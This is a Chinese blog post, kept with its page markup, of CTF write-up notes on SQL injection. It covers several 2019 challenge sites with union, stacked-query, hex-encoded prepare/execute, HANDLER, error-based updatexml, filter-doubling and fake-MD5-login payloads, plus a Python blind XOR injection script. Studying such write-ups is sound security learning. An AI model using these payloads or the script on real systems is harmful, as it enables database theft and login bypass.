
  <!DOCTYPE html>
  <html lang="en"  >
  <head>
  <meta charset="utf-8">
  

  

  

  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};</script>
  
  
  <title>
    
    Flight-star&#39;blog
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="sqli实战————————————在经历sqli-labs后，我决定去实战试试看（也就是刷刷ctf题目）——————————- **[**极客大挑战 2019]LoveSQL 1没有过滤 1**union select 1,(select group_concat(table_name)from information_schema.tables where table_schema&#x3D;datab">
<meta property="og:type" content="article">
<meta property="og:title" content="Flight-star&#39;blog">
<meta property="og:url" content="http://example.com/2025/02/27/sqli%E5%AE%9E%E6%88%98%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="Flight-star&#39;blog">
<meta property="og:description" content="sqli实战————————————在经历sqli-labs后，我决定去实战试试看（也就是刷刷ctf题目）——————————- **[**极客大挑战 2019]LoveSQL 1没有过滤 1**union select 1,(select group_concat(table_name)from information_schema.tables where table_schema&#x3D;datab">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/Blog/source/images/image-20250219214430380.png">
<meta property="article:published_time" content="2025-02-27T09:26:42.457Z">
<meta property="article:modified_time" content="2025-04-05T03:53:10.881Z">
<meta property="article:author" content="Flight-star">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/Blog/source/images/image-20250219214430380.png">
  
  
    <link rel="alternate" href="/atom.xml" title="Flight-star'blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.0.1/dist/aos.css">

  
<meta name="generator" content="Hexo 7.3.0"></head>

  <body>
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff5252" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
         M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="#ff5252" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/">Home</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/archives">Archives</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/about">About</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/friend">Friend</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed" target="_blank"></a>
    
    
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">Flight-star&#39;blog</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content">
          
          <section id="main"><article id="post-sqli实战笔记" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2025/02/27/sqli%E5%AE%9E%E6%88%98%E7%AC%94%E8%AE%B0/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2025-02-27T09:26:42.457Z" itemprop="datePublished">2025-02-27</time>
    <time style="display: none;" id="post-update-time">2025-04-05</time>
  </a>
</div>

      

    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="sqli实战"><a href="#sqli实战" class="headerlink" title="sqli实战"></a>sqli实战</h1><p>————————————在经历sqli-labs后，我决定去实战试试看（也就是刷刷ctf题目）——————————-</p>
<h2 id="极客大挑战-2019-LoveSQL-1"><a href="#极客大挑战-2019-LoveSQL-1" class="headerlink" title="**[**极客大挑战 2019]LoveSQL 1"></a>**[**极客大挑战 2019]LoveSQL 1</h2><p>没有过滤</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3 or 1 = 1 #**</span><br></pre></td></tr></table></figure>

<p>查出Hello geekuser,l0ve1ysq1！(表)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**1&#x27; union select 1,(select group_concat(column_name)from information_schema.columns where table_name=&#x27;l0ve1ysq1&#x27;),3 or 1 = 1 #**</span><br></pre></td></tr></table></figure>

<p>试了发现是第二个表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**1&#x27; union select 1,(select group_concat(id,username,password) from l0ve1ysq1),3 or 1 = 1 #**</span><br></pre></td></tr></table></figure>

<p>查询出最后的flag</p>
<h2 id="SUCTF-2019-EasySQL-1"><a href="#SUCTF-2019-EasySQL-1" class="headerlink" title="[SUCTF 2019]EasySQL 1"></a><strong>[SUCTF 2019]EasySQL 1</strong></h2><p>多次尝试发现or&#x2F;and&#x2F;from……等等被过滤了（其实是<strong>prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&amp;|</strong>“—-全被过滤）</p>
<p>尝试堆叠注入（因为show&#x2F;select没被禁用，符号也没有被禁）【发现可行】</p>
<p>输入abc发现依然没有回显。这时我们可以总结出一条规律，输入非0数字**–有会显，<strong>输入0或字母</strong>–没有回显，我们由此可以猜测后端代码含有 ||或运算符。（查的）**</p>
<p>源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql = &quot;select &quot;.$post[&#x27;query&#x27;].&quot;||flag from Flag&quot;;</span><br></pre></td></tr></table></figure>

<p>输入【***,1】**来绕过</p>
<p>代码会变成**select *,1||flag from Flag;——–*<em>（select</em>可以同时查询Flag里面全部的列）</p>
<h2 id="强网杯-2019-随便注"><a href="#强网杯-2019-随便注" class="headerlink" title="[强网杯 2019]随便注"></a><strong>[强网杯 2019]随便注</strong></h2><p>测试发现1’无法注入，发现<strong>堆叠注入</strong>可以。</p>
<p>测试select union 发现                       return preg_match(“&#x2F;<strong>select|update|delete|drop|insert|where</strong>|.&#x2F;i”,$inject);</p>
<p>都被注释了，只能用order by&#x2F;show查出库，表，列中flag的位置（<strong>后面就不会了</strong>）</p>
<p><strong>查答案后：</strong></p>
<p><strong>方法一****：</strong>使用十六进制编码构造**payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#</span><br></pre></td></tr></table></figure>

<p><strong>SeT@a</strong>：设置变量，方便后面不用写那么多</p>
<p><strong>0x73656c656374202a2066726f6d20603139313938313039333131313435313460</strong>意思是：select * from 1919810931114514&#96;&#96;</p>
<p><strong>prepare execsql from @a</strong>：把变量a放到预备队列</p>
<p><strong>execute execsql</strong>：执行预备队列</p>
<p><strong>方法二：</strong>  使用<strong>handler</strong>查询语句</p>
<p>构造<strong>1’; handler <code>1919810931114514</code> open as <code>a</code>; handler <code>a</code> read next;#</strong></p>
<p>（<code>1919810931114514</code>）是表名字一定<strong>纯数字</strong>一定要加**&#96;&#96;**(<strong>波浪号</strong>)</p>
<p>**open as <code>a</code>**：意思是把表<code>1919810931114514</code>视作新名字<code>a</code> </p>
<p><strong>handler <code>a</code> read next</strong>：意思是再读取a（也就是成功读取了表flag）</p>
<h2 id="极客大挑战-2019-BabySQL（简单过滤）"><a href="#极客大挑战-2019-BabySQL（简单过滤）" class="headerlink" title="[极客大挑战 2019]BabySQL（简单过滤）"></a><strong>[极客大挑战 2019]BabySQL</strong>（简单过滤）</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=&#x27;geek&#x27; #</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name=&#x27;b4bsql&#x27;#</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; ununionion seselectlect 1,2,group_concat(username ,id , passwoorrd) frfromom b4bsql#</span><br></pre></td></tr></table></figure>





<h2 id="极客大挑战-2019-HardSQL（经典报错注入）"><a href="#极客大挑战-2019-HardSQL（经典报错注入）" class="headerlink" title="[极客大挑战 2019]HardSQL（经典报错注入）"></a>[极客大挑战 2019]HardSQL（经典报错注入）</h2><p><strong>输入1’发现有注入点</strong></p>
<p><strong>试了半天发现都不行，只能去查了</strong></p>
<p><strong>我们需要一个字典！！！！！！</strong></p>
<p><strong>可以看到很多字符&#x3D;、–+、&#x2F;**&#x2F;和一些注入命令union、by、‘1’&#x3D;’1等被过滤</strong></p>
<p><strong>空格也被注释</strong></p>
<p>使用报错注入：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#</span><br></pre></td></tr></table></figure>

<p>——-（查表）</p>
<p><em><strong>由于没有空格，所以每一个函数节点，都要用（）包裹</strong></em></p>
<p>**1’or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’))),1))#——-**（查列）</p>
<p><strong>查前半flag：（第一种）</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;or(updatexml(1,concat(0x7e,(select(group_concat(&#x27;~&#x27;,password))from(H4rDsq1))),1))#</span><br></pre></td></tr></table></figure>

<p><strong>（第二种）：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;or(updatexml(1,concat(0x7e,(select(password)from(H4rDsq1))),1))#</span><br></pre></td></tr></table></figure>

<p><strong>查后半：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;or(updatexml(1,concat(0x7e,(select((right(password,25)))from(H4rDsq1))),1))#</span><br></pre></td></tr></table></figure>





<h2 id="GXYCTF2019-BabySQli"><a href="#GXYCTF2019-BabySQli" class="headerlink" title="[GXYCTF2019]BabySQli"></a><strong>[GXYCTF2019]BabySQli</strong></h2><p>（考察<strong>use&#x2F;password位置</strong>和<strong>MD5</strong>加密）</p>
<p>发现过滤了很多，但是没有过滤union select 1,2,3</p>
<p>查了发现可以使用<strong>伪密码</strong>，构造payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=1&#x27; union select 1,&#x27;admin&#x27;,&#x27;c4ca4238a0b923820dcc509a6f75849b&#x27;#&amp;pw=1</span><br></pre></td></tr></table></figure>

<p>————————这是post传输，所以要用抓包注入</p>
<p><strong>c4ca4238a0b923820dcc509a6f75849b</strong>————对1的MD5加密</p>
<p><em>在sql数据库中一般都是通过MD5进行加密，这样子加密后不会被发现。</em></p>
<p>明明**&amp;pw&#x3D;1都被注释<strong>了，为什么还是要写呢？———————-为了绕过防火墙，认为你是正常的数据，</strong>伪登入**。</p>
<h2 id="极客大挑战-2019-FinalSQL（异或注入）"><a href="#极客大挑战-2019-FinalSQL（异或注入）" class="headerlink" title="[极客大挑战 2019]FinalSQL（异或注入）"></a>[极客大挑战 2019]FinalSQL（异或注入）</h2><p>（一定要找到正确的注入点）</p>
<p><strong>在全局注释掉大部分的情况下剩下一个’和^能用就行</strong></p>
<p>刚开始还想在主要的网页进行注入，发现连’都被注释了，只能另寻注入点。</p>
<p>后面发现在那几个页面里</p>
<p><img src="/Blog/source/images/image-20250219214430380.png" alt="image-20250219214430380"></p>
<p>经过测试与查询，发现只有^能用，那就使用异或注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://d9cc6ff9-ac2f-4193-985d-dce132ad08bd.node3.buuoj.cn/search.php?id=1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))&gt;1)^1</span><br></pre></td></tr></table></figure>

<p>解释：^会导致左右就行异或运算括号里的不会被注释，会优先计算，如果为真就返回1，1^1为1，即可得到正确页面，若是假，就会返回1^0，得到假页面。</p>
<p>发现可以，页面会返回read，那就用read为线索做脚本（参考：</p>
<p>[]: <a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_37589805/article/details/116525525">https://blog.csdn.net/qq_37589805/article/details/116525525</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">import re</span><br><span class="line">import requests</span><br><span class="line">import string</span><br><span class="line"></span><br><span class="line">url = &quot;http://55e943c2-e940-4f03-baf2-d0401c02f939.node3.buuoj.cn/search.php&quot;</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line"></span><br><span class="line">def payload(i, j):</span><br><span class="line">    sql = &quot;1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))&gt;%d)^1&quot; % (i, j)</span><br><span class="line">    data = &#123;&quot;id&quot;: sql&#125;</span><br><span class="line">    r = requests.get(url, params=data)</span><br><span class="line">    # print (r.url)</span><br><span class="line">    if &quot;Click&quot; in r.text:</span><br><span class="line">        res = 1</span><br><span class="line">    else:</span><br><span class="line">        res = 0</span><br><span class="line">    return res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def exp():</span><br><span class="line">    global flag</span><br><span class="line">    for i in range(1, 10000):</span><br><span class="line">        print(i, &#x27;:&#x27;)</span><br><span class="line">        low = 31</span><br><span class="line">        high = 127</span><br><span class="line">        while low &lt;= high:</span><br><span class="line">            mid = (low + high) // 2</span><br><span class="line">            res = payload(i, mid)</span><br><span class="line">            if res:</span><br><span class="line">                low = mid + 1</span><br><span class="line">            else:</span><br><span class="line">                high = mid - 1</span><br><span class="line">        f = int((low + high + 1)) // 2</span><br><span class="line">        if (f == 127 or f == 31):</span><br><span class="line">            break</span><br><span class="line">        # print (f)</span><br><span class="line">        flag += chr(f)</span><br><span class="line">        print(flag)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">exp()</span><br><span class="line">print(&#x27;flag=&#x27;, flag)</span><br><span class="line">结果：</span><br><span class="line">information_schema,mysql,performance_schema,test,geek</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>查出就可以查表，查列，查flag：使用geek数据库获取表名，修改代码为：sql &#x3D; “1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)&#x3D;’geek’),%d,1))&gt;%d)^1”%(i,j)，结果：F1naI1y,Flaaaaag</p>
<p>使用F1nal1y表获取列名：sql &#x3D; “1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name&#x3D;’F1naI1y’)),%d,1))&gt;%d)^1”%(i,j)结果：id,username,password</p>
<p>获取password里面的flag：sql &#x3D; “1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))&gt;%d)^1” % (i, j)，结果：cl4y_is_really_amazing,welcome_to_my_blog,<a target="_blank" rel="noopener" href="http://www.cl4y.top,http//www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag%7Bba273fbb-d4d3-4d3b-8477-d334b538ed79%7D">http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ba273fbb-d4d3-4d3b-8477-d334b538ed79}</a></p>
<p>————————————————————————————————————————————————————————————</p>
<p>参考原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_37589805/article/details/116525525">https://blog.csdn.net/qq_37589805/article/details/116525525</a></p>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      

    </footer>
  </div>
  
    
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/covers/sakuya looking back.jpg" data-sizes="auto" alt="" class="lazyload">
          
        
        <a href="/2025/02/27/uploud%E5%AE%9E%E6%88%98%E7%AC%94%E8%AE%B0/"></a>
        <div class="article-nav-caption">Newer</div>
        <h3 class="article-nav-title">
          
            (no title)
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="https://github.com/Flight-star-cy/my-images/blob/main/hezhao%2002.jpg" data-sizes="auto" alt="" class="lazyload">
        
      
      <a href="/2025/02/27/%E7%AE%80%E5%8D%95WAF%E7%BB%95%E8%BF%87/"></a>
      <div class="article-nav-caption">Older</div>
      <h3 class="article-nav-title">
        
          (no title)
        
      </h3>
    </div>
    
  </nav>


  
</article>






</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#sqli%E5%AE%9E%E6%88%98"><span class="toc-number">1.</span> <span class="toc-text">sqli实战</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-LoveSQL-1"><span class="toc-number">1.1.</span> <span class="toc-text">**[**极客大挑战 2019]LoveSQL 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SUCTF-2019-EasySQL-1"><span class="toc-number">1.2.</span> <span class="toc-text">[SUCTF 2019]EasySQL 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="toc-number">1.3.</span> <span class="toc-text">[强网杯 2019]随便注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-BabySQL%EF%BC%88%E7%AE%80%E5%8D%95%E8%BF%87%E6%BB%A4%EF%BC%89"><span class="toc-number">1.4.</span> <span class="toc-text">[极客大挑战 2019]BabySQL（简单过滤）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-HardSQL%EF%BC%88%E7%BB%8F%E5%85%B8%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">1.5.</span> <span class="toc-text">[极客大挑战 2019]HardSQL（经典报错注入）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GXYCTF2019-BabySQli"><span class="toc-number">1.6.</span> <span class="toc-text">[GXYCTF2019]BabySQli</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-FinalSQL%EF%BC%88%E5%BC%82%E6%88%96%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">1.7.</span> <span class="toc-text">[极客大挑战 2019]FinalSQL（异或注入）</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Flight-star" class="lazyload">
  <div class="sidebar-author-name">Flight-star</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">69</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">11</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Home</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Archives</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">About</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Friend</div>
    </div>
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  
</aside>

          
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2020-2025
      <span class="footer-info-sep"></span>
      Flight-star
    </div>
    
      <div>
        Powered by&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        65.1k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        05:01
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#sqli%E5%AE%9E%E6%88%98"><span class="toc-number">1.</span> <span class="toc-text">sqli实战</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-LoveSQL-1"><span class="toc-number">1.1.</span> <span class="toc-text">**[**极客大挑战 2019]LoveSQL 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SUCTF-2019-EasySQL-1"><span class="toc-number">1.2.</span> <span class="toc-text">[SUCTF 2019]EasySQL 1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="toc-number">1.3.</span> <span class="toc-text">[强网杯 2019]随便注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-BabySQL%EF%BC%88%E7%AE%80%E5%8D%95%E8%BF%87%E6%BB%A4%EF%BC%89"><span class="toc-number">1.4.</span> <span class="toc-text">[极客大挑战 2019]BabySQL（简单过滤）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-HardSQL%EF%BC%88%E7%BB%8F%E5%85%B8%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">1.5.</span> <span class="toc-text">[极客大挑战 2019]HardSQL（经典报错注入）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#GXYCTF2019-BabySQli"><span class="toc-number">1.6.</span> <span class="toc-text">[GXYCTF2019]BabySQli</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-FinalSQL%EF%BC%88%E5%BC%82%E6%88%96%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">1.7.</span> <span class="toc-text">[极客大挑战 2019]FinalSQL（异或注入）</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Flight-star" class="lazyload">
  <div class="sidebar-author-name">Flight-star</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">69</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
